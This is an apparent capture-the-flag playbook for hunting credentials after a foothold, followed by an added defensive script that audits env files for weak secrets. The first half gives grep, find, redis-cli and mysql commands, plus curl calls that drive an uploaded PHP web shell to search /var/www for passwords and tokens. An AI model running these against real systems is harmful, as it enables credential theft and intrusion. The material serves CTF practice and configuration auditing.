Use when a foothold, file-read, source disclosure, Redis, database, session, or config leak may contain credentials or reusable secrets.
Use this whenever a foothold or file-read exists. The fastest next flag is often in config, sessions, cache, or database rows.
.env, config.php, settings.py, database.yml, application.properties, docker-compose.yml.
/proc/self/environ, session directories, upload directories, logs, backup files.
SECRET_KEY, Django SECRET_KEY, JWT keys, signing salts, API tokens.

grep -R --line-number -Ei 'password|passwd|secret|token|apikey|dsn|mysql|redis|flag\{' /var/www 2>/dev/null | head -n 80
find / -maxdepth 4 -type f \( -name '.env' -o -iname '*config*' -o -iname '*.sqlite*' -o -iname '*backup*' \) 2>/dev/null
redis-cli -h HOST -a 'PASSWORD' --no-auth-warning keys '*'
mysql -h HOST -uroot -proot -e 'show databases;'
After a foothold on a PHP site:
curl -sG --data-urlencode 'cmd=grep -R -nEi "redis|mysql|password|secret|token" /var/www 2>/dev/null | head -n 50' \
http://target/uploads/shell.php
curl -sG --data-urlencode 'cmd=find /var/www -maxdepth 4 -type f \( -name ".env" -o -iname "*config*" \) 2>/dev/null' \
http://target/uploads/shell.php
If config reveals:
REDIS_PASSWORD=12345678
DB_USER=root
DB_PASS=root

then stop searching random files and immediately validate those services, dump app tables, and look for:
flag{...} immediately.
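
Seen from the defending side, the config shown above is itself the finding: a digits-only Redis password and a database password equal to its username, in a file other users can read. The following is an added example, not part of the original page, that audits an env-style file for those conditions without printing any secret value. The names `audit_env` and `write_sample`, the 12-character threshold, and the sample file are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original page: audit an env-style config file
# for weak or exposed secrets. Values are never printed, only key and reason.

# audit_env FILE -> one "NAME: reason" line per finding
audit_env() {
    # Position 8 of the ls mode string is the "others can read" bit.
    case $(ls -ld "$1") in
        ???????r*) echo "FILE: world-readable" ;;
    esac
    awk -F= '
        /^[ \t]*#/ || /^[ \t]*$/ { next }      # skip comments and blank lines
        {
            key = $1
            val = substr($0, length(key) + 2)  # everything after the first "="
            gsub(/^"|"$/, "", val)             # drop surrounding double quotes
            if (toupper(key) ~ /USER/) users[val] = 1
            # Same key classes as the grep pattern used on the page.
            if (toupper(key) ~ /PASS|SECRET|TOKEN|APIKEY|DSN/) {
                keys[++n] = key; vals[n] = val
            }
        }
        END {
            for (i = 1; i <= n; i++) {
                v = vals[i]; why = ""
                if (v == "")             why = "empty"
                else if (v in users)     why = "same as a username"
                else if (v ~ /^[0-9]+$/) why = "digits only"
                else if (length(v) < 12) why = "shorter than 12 characters"
                if (why != "") print keys[i] ": " why
            }
        }' "$1"
}

# Constructed sample input using the values shown in the text above.
write_sample() {
    cat > "$1" <<'EOF'
# constructed sample, not a real deployment
REDIS_PASSWORD=12345678
DB_USER=root
DB_PASS=root
SECRET_KEY="kq7Zp2vXw9LmT4sB8nRd3YhF"
EOF
    chmod 644 "$1"
}

tmp=$(mktemp) && write_sample "$tmp" && audit_env "$tmp"
rm -f "$tmp"
```

Run against each deployed config file before release; any output line is a credential to rotate or a file mode to tighten.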